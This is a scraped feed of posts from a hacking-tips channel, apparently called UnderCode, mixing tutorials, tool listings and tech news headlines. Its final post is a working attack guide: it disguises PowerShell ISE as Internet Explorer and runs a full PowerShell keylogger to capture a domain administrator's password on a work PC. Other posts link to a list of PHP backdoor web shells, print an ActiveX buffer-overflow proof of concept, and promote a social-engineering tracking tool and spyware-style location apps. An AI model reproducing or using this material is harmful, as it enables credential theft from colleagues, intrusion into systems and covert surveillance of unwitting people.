▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A GOOD WORKING TRACKING TOOL 2020 :

Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt

4) python2 -m pip install -r requirements.txt
Example of execution

🦑Example: python2 trape.py --url http://example.com --port 8080
HELP AND OPTIONS

user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MalConfScan: Volatility plugin to extract configuration data for known malware:

Ursnif
Emotet
Smoke loader
PoisonIvy
CobaltStrike
NetWire
PlugX
RedLeaves / Himawari / Lavender / Armadill / zark20rk
TSCookie
TSC_Loader
xxmm
Datper
Ramnit
HawkEye
Lokibot
Bebloh (Shiotob / URLZone)
AZORult
NanoCore RAT
AgentTesla
FormBook
NodeRAT ( https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html )
MalConfScan has a function for displaying a list of strings referenced by malicious code.

Configuration data is usually encoded by malware.

The malware writes decoded configuration data to memory, it may be in memory.

This function can list decoded configuration data.

🦑https://github.com/JPCERTCC/MalConfScan/wiki/how-to-install

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to install Apache mod_cloudflare on Debian ?

1) Cloudflare provides an official module for Apache server to capture real IP address.

2) Add GPG - Open Terminal and run the following commands to enable adding the gpg key to your system.

sudo apt install curl

curl -C - https://pkg.cloudflare.com/pubkey.gpg | sudo apt-key add -

Add PPA - then add cloudflare repository to your debian system

echo "deb http://pkg.cloudflare.com/ lsb_release -cs main" |
sudo tee /etc/apt/sources.list.d/cloudflare.list

3) Install the package - then update the Apt cache and install the libapache2-mod-cloudflare package on your Ubuntu system.
sudo apt update

sudo apt install libapache2-mod-cloudflare

4) Press "Y" to confirm the request during installation.
Restart Apache

5) After the installation is complete, restart the Apache2 service and check the active modules using the following commands.

sudo systemctl restart apache2
It's all.

6) The Apache server now logs the visitor's real IP address.
sudo apache2ctl -M
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Preview of Apple Conference in November.
#Technologies

READ MORE - https://undercodenews.com/preview-of-apple-conference-in-november/07/11/2020/

New Unpatched IBM QRadar SIEM vulnerability could allow a attacker can bypass access restrictions to data.
#Vulnerabilities

READ MORE - https://undercodenews.com/new-unpatched-ibm-qradar-siem-vulnerability-could-allow-a-attacker-can-bypass-access-restrictions-to-data/07/11/2020/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 GPS TRACKING APPLICATIONS:

https://play.google.com/store/apps/details?id=com.gpsmapcamera.geotagginglocationonphoto&hl=en

https://play.google.com/store/apps/details?id=org.findmykids.app&hl=en_IN

https://apps.apple.com/us/app/google-maps-transit-food/id585027354

https://play.google.com/store/apps/details?id=com.google.android.apps.maps&hl=en_US

https://apps.apple.com/us/app/famisafe-parental-control/id1385417904

https://play.google.com/store/apps/details?id=com.wondershare.famisafe

https://apps.apple.com/us/app/life360-family-locator/id384830320

https://play.google.com/store/apps/details?id=com.life360.android.safetymapd&hl=en

https://my.spyzie.com/signup.html

https://apps.apple.com/us/app/glympse-share-your-location/id330316698

https://play.google.com/store/apps/details?id=com.glympse.android.glympse

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Largest cryptocurrency seizure: $1,000,000,000 was seized from the wallet of the Silk Road.
#DataBreaches

New Critical unpatched Vulnerability in Micro Focus can leak the password login.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is PaaS?

1) Platform-as-a-Service (PaaS) is a cloud computing model that provides a platform on which customers can develop, secure, run, and manage web applications.
It provides an optimized environment in which different teams can develop and deploy applications without buying or managing the underlying IT infrastructure and related services.

2) Typically, the platform provides the necessary resources and infrastructure to support the entire software development and deployment lifecycle, while providing developers and users with access from anywhere over the Internet.

3) The benefits of PaaS include, but are not limited to, simplicity, convenience, lower cost, flexibility, and scalability.

4) Typically PaaS protection differs from a traditional on-premises datacenter, as we'll see.

5) The PaaS environment is based on a shared security model.

6) The provider protects the infrastructure, and PaaS customers are responsible for protecting their accounts, applications, and data hosted on the platform.
Ideally, security moves from a local security model to an identity perimeter.

This means that the PaaS customer must place more emphasis on identity as the primary security perimeter.

Issues to look out for include security, testing, code, data and configuration, employees, users, authentication, operations, monitoring, and logs.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP backdoors shells new:

[Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)

B374K Shell

[C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)

R57 Shell

[Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)

0byt3m1n1 Shell

[Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)

AK-47 Shell

[Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)

Marion001 Shell

[Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)

p0wny-shell

[Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)

Webadmin Shell

[Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)

LazyShell

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to create a hidden folder with password in Win system:

1) First create a folder and name it "hidden files";

2) Then open the folder, then right-click the mouse in the blank area of ​​the window and select the "New → Text Document" command to create a text file;

3) Copy the following code into the newly created text file:

@ECHO OFF
　　title Folder Private
　　if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
　　if NOT EXIST Private goto MDLOCKER
　　:CONFIRM
　　echo Are you sure you want to lock the folder(Y/N)
　　set/p "cho=>"
　　if %cho%==Y goto LOCK
　　if %cho%==y goto LOCK
　　if %cho%==n goto END
　　if %cho%==N goto END
　　echo Invalid choice.
　　goto CONFIRM
　　:LOCK
　　ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　echo Folder locked
　　goto End
　　:UNLOCK
　　echo Enter password to unlock folder
　　set/p "pass=>"
　　if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
　　attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
　　ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
　　echo Folder Unlocked successfully
　　goto End
　　:FAIL
　　echo Invalid password
　　goto end
　　:MDLOCKER
　　md Private
　　echo Private created successfully
　　goto End
　　:End
4) replace "PASSWORD_GOES_HERE" with the password you want, such as: 12345, the final effect is: if NOT %pass%== 12345 goto FAIL;

5) Then save the text file as .bat format, the file name can be set to "locker.bat", reminder, set the save type to "all files" to save successfully;

6) Double-click the "Locker.bat" file again to make the contents of the "Private" folder disappear. Enter "Y" in the command prompt window that appears and press Enter; at this time, we found that the folder is hidden

@UndercodeTesting
don't clone our tips:)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC for 2008-2012 versions:

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';


var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}


document.write(body buf body1);

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

💉 App security tips for mobile, web, and desktop apps :

1) Make sure your application has no vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.

Make sure there are no known vulnerabilities in your application.

It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.

2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.

Security testing doesn't slow down the development process.

Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.

Therefore, consider checking the security of your applications before going into production.

3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.

This program allows your organization to find and fix bugs before they become known to the public or known hackers.

This way you can prevent incidents.

4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.

Knowledge of cybersecurity can help your organization counter the threats of your applications.

5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.

Consider using an automated scanner to scan that will run tests daily.

You can also use vulnerability scanning tools that are automated.

Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.

6) Think Before Using Open Source In Your Application
open source can be vulnerable.

Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.

So think twice before using open source in your application.

Riskemy.com says, "Just one line of broken code can destroy an entire site."

7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.

8) Penetration testing also helps protect your applications
Penetration testing is also a pentest.

Penetration testing is useful for protecting cybercriminal applications.

Penetration testing is the practice of discovering vulnerabilities in a computer system, network, or web application that an attacker could exploit.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

New Samsung Vulnerability allows attackers to bypass authentication for a locked Gallery.
#Vulnerabilities

Many unpatched Vulnerabilities in android LG devices.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to check for unnecessary subscriptions on iPhone?
#FastTips

1) These days, one-time purchases of games, music, books, news, movies, and TV shows on mobile are being replaced by monthly subscriptions. It is enough to subscribe once and the funds will be automatically debited every month. There are free trial periods, to gain access to which you also need to subscribe to the service. After that, you can forget to unsubscribe if you don't want to pay. Or some don't know how to unsubscribe. We will tell you how to avoid such troubles.

2) There are several ways to check for subscriptions on iPhone, whether paid or free. Subscriptions made with your Apple ID account are verified. Services like Apple Arcade, Apple News +, Apple Music, Apple TV +, Apple TV, and third-party services appear in one place.

3) You can access the subscription management page from applications such as Books, Music, iTunes Store. The fastest way to do this is in system settings, App Store and TV apps.

Settings: Apple ID -> Subscriptions

Profile icon (in Today, Games, Apps and Arcade) -> subscriptions on the app Store

4) Settings (left), App Store (center), TV (right)

Once on the subscription page, you will see all subscriptions associated with your Apple ID account, active and expired. To cancel, click under the active ones, then click "Cancel free trial" or "Cancel subscription", then in the window click "Confirm".

5) Keep in mind that these are only Apple ID-related subscriptions. You may have others with other accounts that do not appear on this page. If you suspect the existence of such subscriptions, check the corresponding applications. Examples include subscriptions to GrubHub, DoorDash, Netflix, Hulu.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Tech giants face more investigations, Apple’s app store can’t stand alone.
#international

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑⚙️How to get an admin password on a work PC in an Active Directory domain?

A) First, find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example an icon of a folder or an icon of software allowed in the organization in * .ico format, for example 1C.

B) I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.


c) Then open Windows PowerShell ISE and copy the keylogger script code:

#requires -Version 2

function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")

{

# Signatures for API Calls

$ signatures = @ '

[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]

public static extern short GetAsyncKeyState (int virtualKeyCode);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int GetKeyboardState (byte [] keystate);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int MapVirtualKey (uint uCode, int uMapType);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@

# load signatures and make members available

$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru


# create output file

$ null = New-Item -Path $ Path -ItemType File -Force

try

{

Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red




# create endless loop. When user presses CTRL + C, finally-block

# executes and shows the collected key presses

while ($ true) {

Start-Sleep -Milliseconds 40



# scan all ASCII codes above 8

for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {

# get current key state

$ state = $ API :: GetAsyncKeyState ($ ascii)




# is key pressed?

if ($ state -eq -32767) {

$ null = [console] :: CapsLock




# translate scan code to real code

$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)




# get keyboard state for virtual keys

$ kbstate = New-Object Byte [] 256

$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)




# prepare a StringBuilder to receive input key

$ mychar = New-Object -TypeName System.Text.StringBuilder




# translate virtual key

$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)




if ($ success)

{

# add key to logger file

[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)

}

}

}

}

}

finally

{

# open logger file in Notepad

notepad $ Path

}

}




# records all key presses until script is aborted by pressing CTRL + C

# will then open the file with collected key codes

🦑Start-KeyLogger

Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, we launch our script with the Run script command

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁